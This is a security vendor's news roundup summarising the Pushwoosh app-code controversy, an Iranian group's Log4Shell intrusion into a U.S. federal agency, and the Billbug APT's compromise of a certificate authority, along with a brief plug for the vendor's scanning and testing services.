Over the last week there have been several major stories in the international community involving Russia, Iran and China. Russian code was discovered in in the U.S. Army and CDC applications; Iranian hackers used Log4Shell to compromise a U.S. Federal agency; the China-based APT group, Billbug, was able to compromise a Certificate Authority (CA) as part of an espionage campaign. Check out each story below for more detail.
Russian Company Pushwoosh Code Found in U.S. Army & CDC Applications
The company Pushwoosh, an organization that offers data processing for applications, has been disguising itself as a U.S. organization based out of Washington, D.C. and Maryland. However, Reuters has discovered Pushwoosh is, in fact, a Russian backed company whose HQ is based out of Novosibirsk, Siberia. Since it is a company registered to the Russian government and pays taxes to the Russian government, they must comply with the laws of Russia. This would require sharing data when and if requested by the Russian government. Pushwoosh code has been implemented in a U.S. Army application that is used as an information portal for the National Training Center. The code was removed earlier in the year with the reason stated as “security issues.” The CDC was using Pushwoosh code within many public-facing applications but has since removed the code. In addition to the U.S. Army and the CDC, Pushwoosh code is used in over 8,000 applications in the iOS App store and the Google Play store including the likes of UEFA, Deloitte, Coca-Cola, McDonald’s and Unilever. Max Konev, the founder of Pushwoosh, is claiming his company “has no connection with the Russian government of any kind” and that all data is stored in either the US or Germany. At this time, evidence has not been brought forward showing Pushwoosh has shared any data with the Russian Government, but that does not mean they have not or could not in the future.
Iranian Hackers Used Log4Shell to Compromise a U.S. Federal Agency
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has credited an Iranian-sponsored group for compromising an unpatched VMWare Horizon server owned by a U.S. Federal agency using the Log4Shell vulnerability. CISA responded to the incident over the summer and discovered crypto mining software was installed on the server. The attackers pivoted through the network to compromised credentials and the domain controllers (DC), then installed reverse proxies in order to maintain their persistent access. CISA believes the original compromise happened in February of 2022. Once the group had access, they added a rule within Windows Defender to the allow list on the C:\ drive. This led to the ability to download PowerShell scripts, execute malicious code like PSExec and Mimikatz, which aided in furthering the attack. Additionally, the attackers changed the password for a local administrator account.
nGuard detailed the Log4Shell vulnerability back in January. If you feel Log4Shell is still an issue within your organization nGuard offers Log4j scanning, consulting services, log management and event collection and penetration testing services.
Billbug, a China-Based APT Compromised a Certificate Authority
Billbug, a state-sponsored APT group, was able to compromise an unknown Certificate Authority as a part of an espionage campaign. If the attackers could successfully gain access to the certificates, they could use them to sign their own malware in order to bypass security checks and intercept and successfully decrypt HTTPS traffic. The Symantec Threat Hunting team was able to make this discovery and report it to the affected Certificate Authority. At this time there is no evidence or indication that Billbug was able to compromise or gain access to any digital certificates.